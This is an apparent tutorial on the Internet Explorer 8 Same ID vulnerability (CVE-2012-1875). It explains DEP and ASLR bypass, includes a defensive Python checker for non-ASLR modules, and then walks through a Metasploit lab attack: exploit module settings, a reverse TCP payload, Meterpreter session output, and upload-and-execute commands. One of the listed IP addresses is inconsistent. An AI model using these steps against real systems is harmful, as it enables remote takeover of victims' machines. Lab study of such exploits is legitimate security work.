Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Same ID Property Remote Code Execution Vulnerability."
Two technologies in modern operating systems are used to make exploits of this sort harder: DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomisation).
DEP is intended to prevent an application or service from executing code from a non-executable memory region. This helps prevent certain exploits that store code via a buffer overflow. (Wikipedia)
ASLR loads software modules such as DLLs into memory at randomised locations. Moving system DLLs around makes it harder for attackers to guess where to find the library functions they need, such as URLDownloadToFile() and CreateProcess().
But DEP and ASLR don't make remote code execution attacks impossible, just trickier.
In the case of CVE-2012-1875, ASLR can be bypassed by forcing Internet Explorer to find and load an old version of the Microsoft C runtime DLL, one which was compiled before ASLR became the norm and therefore doesn't support it. Whenever a non-ASLR DLL is loaded, even into an ASLR-enabled program, its location in memory is predictable.
DEP is then bypassed using a technique known as ROP, or return-oriented programming.
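Whether a module opts in to these mitigations is recorded in its PE header (the DllCharacteristics field), so a defender can audit a process's loaded modules for exactly the kind of non-ASLR DLL this bypass relies on. The following Python is an added example, not code from the original post: it parses the PE header, reports the ASLR (DYNAMIC_BASE) and DEP (NX_COMPAT) bits, and lists modules whose load address would be predictable. The header bytes it runs on are constructed for the example and are not a real DLL.

```python
import struct

# DllCharacteristics bits from the PE/COFF specification
DYNAMIC_BASE = 0x0040  # image may be rebased at load time (ASLR opt-in)
NX_COMPAT = 0x0100     # image is compatible with DEP


def pe_mitigations(data: bytes) -> dict:
    """Parse the PE headers in `data` and report its ASLR/DEP opt-in flags."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # The optional header follows the 4-byte signature and 20-byte COFF header.
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):  # PE32 / PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics sits at offset 70 in both PE32 and PE32+ optional headers.
    dllchars = struct.unpack_from("<H", data, opt + 70)[0]
    return {
        "aslr": bool(dllchars & DYNAMIC_BASE),
        "dep": bool(dllchars & NX_COMPAT),
        "dllcharacteristics": dllchars,
    }


def modules_without_aslr(modules: dict) -> list:
    """Given {name: header bytes}, return names whose load address is predictable."""
    return sorted(name for name, data in modules.items()
                  if not pe_mitigations(data)["aslr"])


def constructed_header(dllchars: int) -> bytes:
    """Minimal PE32 header constructed for this example; not a real DLL."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)   # e_lfanew = 64
    coff = b"PE\0\0" + b"\0" * 20
    opt = bytearray(96)
    struct.pack_into("<H", opt, 0, 0x10B)       # PE32 magic
    struct.pack_into("<H", opt, 70, dllchars)   # DllCharacteristics
    return dos + coff + bytes(opt)


if __name__ == "__main__":
    # Constructed sample: one module built with both mitigations, one old one without.
    sample = {"modern.dll": constructed_header(DYNAMIC_BASE | NX_COMPAT),
              "old_crt.dll": constructed_header(0)}
    print(modules_without_aslr(sample))  # ['old_crt.dll']
```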
Exploit for the Internet Explorer Same ID Vulnerability (CVE-2012-1875):
- Target OS: Windows XP SP3
- Attacker OS: BackTrack or any pentesting distro
As usual, you have to create two VMs in VirtualBox.
Preparing the victim system:
Install Windows XP SP3 in one of the VMs. Change the VM's network adapter to the Host-only adapter. (If you don't know what I am talking about, please use the VirtualBox manual.)
Preparing the attacker system:
Update the Metasploit modules by entering the following command in the terminal:
Or you can download the 'ms12_037_same_id.rb' module and paste it into this directory: "/opt/metasploit/msf3/modules/exploits/windows/browser/"
Configuring the exploit settings in Metasploit:
Open the terminal and type "msfconsole" to get the Metasploit console.
Type "use exploit/windows/browser/ms12_037_same_id" in the console.
Now we need the list of settings available for this exploit module. To get the list, type "show options" in the console.
Command: set SRVHOST 192.168.56.10
Details: Here 192.168.56.11 is the IP of BackTrack. You can get this IP by simply typing "ifconfig" in the terminal.
Command: set URIPATH /
Details: The path at which our exploit will be served.
As usual, we can use the reverse TCP payload for this attack too. So type the following command in the Metasploit console:
OK, let us launch the exploit.
Type "exploit" in the console.
Now the exploit is started. Our exploit is running at "http://192.168.56.10:8080/".
Once the victim loads the URL in his IE browser, you will get the following messages in your Metasploit console:
[*] Client requesting: /
[*] Using JRE ROP
[*] Sending html
[*] Sending stage (752128 bytes) to 192.168.56.12
[*] Meterpreter session 1 opened (192.168.56.10:4444 -> 192.168.56.12:1685)
Type "sessions" to list the active sessions. Type "sessions -i 1"; this opens the connection to the session with id '1' and brings you to Meterpreter.
Now you can control the victim system from your computer using Meterpreter.
'upload /Test.exe c:\': this command uploads Test.exe from the root ('File System') folder of BT5 to the C drive of the target.
'execute -f C:\Test.exe': this command runs our uploaded file on the target.